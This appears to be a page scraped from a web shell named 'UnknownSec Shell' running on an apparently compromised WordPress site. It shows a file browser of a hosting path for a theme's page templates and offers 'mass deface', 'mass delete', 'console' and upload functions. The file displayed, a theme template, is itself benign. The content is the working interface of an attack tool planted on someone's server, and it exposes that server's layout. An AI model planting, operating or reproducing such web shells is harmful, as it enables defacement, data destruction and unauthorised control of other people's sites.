shell bypass 403
UnknownSec Shell
:
/
home
/
akwariom
/
www
/
wp-content
/
themes
/
shapely
/
page-templates
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
template-widget.php
<?php /** * * Template Name: Builder Page * */ ?> <?php get_header(); while ( have_posts() ) { the_post(); global $post; $sidebar_id = 'shapely-' . $post->post_name; if ( ! function_exists( 'dynamic_sidebar' ) || ! dynamic_sidebar( $sidebar_id ) ) { echo '<div class="container p24 wp-caption-text">'; echo '<h5>' . sprintf( esc_html__( 'This is the %s sidebar, add some widgets to it to change it.', 'shapely' ), get_the_title() ) . '</h5>'; echo '</div>'; } } get_footer();
© 2026 UnknownSec